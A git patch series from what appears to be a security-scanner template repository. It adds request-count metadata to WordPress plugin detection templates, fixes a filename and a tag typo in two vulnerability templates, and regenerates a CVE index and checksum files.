diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 2276545093..017cf76f11 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
+    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From 8c3ccf581bdc78bdd7ea504255513043517dee2f Mon Sep 17 00:00:00 2001
From: pentesttools-com 
Date: Thu, 21 Sep 2023 11:10:50 +0300
Subject: [PATCH 0471/1090] fix: typo in template CVE-2023-24735 name

---
 http/cves/2023/{CVE-2023-24735 2.yaml => CVE-2023-24735.yaml} | 0
 1 file changed, 0 insertions(+), 0 deletions(-)
 rename http/cves/2023/{CVE-2023-24735 2.yaml => CVE-2023-24735.yaml} (100%)

diff --git a/http/cves/2023/CVE-2023-24735 2.yaml b/http/cves/2023/CVE-2023-24735.yaml
similarity index 100%
rename from http/cves/2023/CVE-2023-24735 2.yaml
rename to http/cves/2023/CVE-2023-24735.yaml

From 1d768ec91de64835f79e1c33b7323b23f16de0c7 Mon Sep 17 00:00:00 2001
From: pentesttools-com 
Date: Thu, 21 Sep 2023 11:14:20 +0300
Subject: [PATCH 0472/1090] fix: typo in CNVD-2023-76801 tags

In the tags of this CNVD, "cnvd" was misspelled as "cvnd".
---
 http/cnvd/2023/CNVD-C-2023-76801.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/cnvd/2023/CNVD-C-2023-76801.yaml b/http/cnvd/2023/CNVD-C-2023-76801.yaml
index daab9ea654..19c3f621e3 100644
--- a/http/cnvd/2023/CNVD-C-2023-76801.yaml
+++ b/http/cnvd/2023/CNVD-C-2023-76801.yaml
@@ -7,7 +7,7 @@ info:
   description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
   metadata:
     max-request: 2
-  tags: cvnd,cvnd2023,yonyou,rce
+  tags: cnvd,cnvd2023,yonyou,rce
 
 http:
   - raw:

From fb3089af1b13dcacd6f848e7caf0363c5a046108 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 21 Sep 2023 12:05:43 +0000
Subject: [PATCH 0474/1090] Auto Generated cves.json [Thu Sep 21 12:05:43 UTC
 2023] :robot:

---
 cves.json              | 2 +-
 cves.json-checksum.txt | 2 +-
 2 files changed, 2 insertions(+), 2 deletions(-)

diff --git a/cves.json b/cves.json
index 345f08673b..a2fb580a8e 100644
--- a/cves.json
+++ b/cves.json
@@ -1913,7 +1913,7 @@
 {"ID":"CVE-2023-24489","Info":{"Name":"Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution","Severity":"critical","Description":"A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-24489.yaml"}
 {"ID":"CVE-2023-24657","Info":{"Name":"phpIPAM - 1.6 - Cross-Site Scripting","Severity":"medium","Description":"phpIPAM 1.6 contains a cross-site scripting vulnerability via the closeClass parameter at /subnet-masks/popup.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24657.yaml"}
 {"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"}
-{"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735 2.yaml"}
+{"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"}
 {"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"}
 {"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"}
 {"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"}
diff --git a/cves.json-checksum.txt b/cves.json-checksum.txt
index cae8c9ecad..75780b2f11 100644
--- a/cves.json-checksum.txt
+++ b/cves.json-checksum.txt
@@ -1 +1 @@
-06a0dcbc6f141f351e8959dd6763a46a
+178c3c8d3324b13883efb8fa9d35dc98

From 5e16af75d0a0530ce1a2e131a9c431a95b89c2f2 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Thu, 21 Sep 2023 12:05:59 +0000
Subject: [PATCH 0475/1090] Auto Generated Templates Checksum [Thu Sep 21
 12:05:59 UTC 2023] :robot:

---
 templates-checksum.txt | 408 ++++++++++++++++++++---------------------
 1 file changed, 204 insertions(+), 204 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 6dfc9a8251..a82dad9fe0 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -8,8 +8,8 @@ TEMPLATES-STATS.json:17f21c160bed72fb6f675d0f5ade4b5e191870b0
 TEMPLATES-STATS.md:2c7c3af0ac116eb78b25f1537ab533d51f167dcf
 TOP-10.md:cf481618b8666f0cfd3846b7b4a550926093b0b2
 contributors.json:8d840b1db8c1af9a3927448841f817aa9c850de9
-cves.json:26f44f7581551d5cb38bd4dbe2b4941c1ca5a393
-cves.json-checksum.txt:218b03ae2bc08f5ac2450c051ca435c194fbb235
+cves.json:ac82ce259ec3cdb6c6dfa067fcccd0e6a3f81775
+cves.json-checksum.txt:6e5026f8eab48a5cd7d0f2a7052385bd9a0f4c24
 dns/azure-takeover-detection.yaml:bcfb33e8a76b75042967f0301e57dc98d5f2da7c
 dns/caa-fingerprint.yaml:7dcc71c91d6cb3d8e290e09b52768b6017fbb161
 dns/detect-dangling-cname.yaml:bba3b5b57357e86830d9f76e28b988107597b75c
@@ -2538,7 +2538,7 @@ http/cves/2023/CVE-2023-24488.yaml:c409608b9d1050ff5d687eee412278c233f0d85f
 http/cves/2023/CVE-2023-24489.yaml:d10f95bc2c12614e7f7192f57871b8f14da208f2
 http/cves/2023/CVE-2023-24657.yaml:7f6b27269830343d72aabbf9cc3b6468b0402832
 http/cves/2023/CVE-2023-24733.yaml:2b371df5ef8cff42ce8aecc6ef5670299835f5a5
-http/cves/2023/CVE-2023-24735 2.yaml:571e0c8b77e6db4d05d1b26591ce8c23a6605826
+http/cves/2023/CVE-2023-24735.yaml:571e0c8b77e6db4d05d1b26591ce8c23a6605826
 http/cves/2023/CVE-2023-24737.yaml:4054ade9e45e3b511951b4ef62d855c3f224fbf1
 http/cves/2023/CVE-2023-25135.yaml:6fde05cc952e0a48856618cc9f0354636815791a
 http/cves/2023/CVE-2023-25157.yaml:75256e12bfe90097324f0600dcf0e8d2116e9f99
@@ -5852,218 +5852,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:c5fb4f5f04f4d44c858cce9bdcbe7f3606a68f65
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:6b1337d51ba70633ffcb1f7ee597e124cc495a61
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:6c34983a451921b4871a71a257642648e00cdebc
-http/technologies/wordpress/plugins/amp.yaml:3edc2817a56cd8ad27f32ec268ac6193395862f2
-http/technologies/wordpress/plugins/antispam-bee.yaml:fdc8552f09d28482637a53d5be385512a8d3ee12
-http/technologies/wordpress/plugins/astra-sites.yaml:99290366c13ca50eb0e8f80466e00581c822280b
-http/technologies/wordpress/plugins/astra-widgets.yaml:f7265954d79f2976d51ea04401b8371971a8d226
-http/technologies/wordpress/plugins/autoptimize.yaml:e11ed09133228a907ca069378035ce38b4f72f77
-http/technologies/wordpress/plugins/backwpup.yaml:f465ab2fac2cb5d33cbb273e95c99d266ad6ac46
-http/technologies/wordpress/plugins/better-search-replace.yaml:08d9193490a1131216e86ec2dbcc5806db67bf61
-http/technologies/wordpress/plugins/better-wp-security.yaml:31ac060d2dac4ff16c700f62cce3e478c5f0f66f
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:55f69d7e5dca5a91d82d0908d11edf7be0cb1349
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0d81c1c43b8b4acd5ebad30efb116564a06d295f
-http/technologies/wordpress/plugins/breeze.yaml:c366593628c83c9881d375890e07e63cfa8d552b
-http/technologies/wordpress/plugins/broken-link-checker.yaml:df71812c7fa02109aba6905b6adde546c4ac0365
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:2cb6529ade42bd6e577fa6f61a9f3d66cac32e4f
-http/technologies/wordpress/plugins/classic-editor.yaml:fc682aceca9126c4e072c73ff29851a83979cd55
-http/technologies/wordpress/plugins/classic-widgets.yaml:17210161b9efea8396d8445ae4d4cba98e660ba4
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:0a881196a64744bda68c6f1c2681bfd2f84d0ce3
+http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
+http/technologies/wordpress/plugins/akismet.yaml:aae1aaad5533df8ca3806e87626f5bd7a3ed48d7
+http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
+http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
+http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
+http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
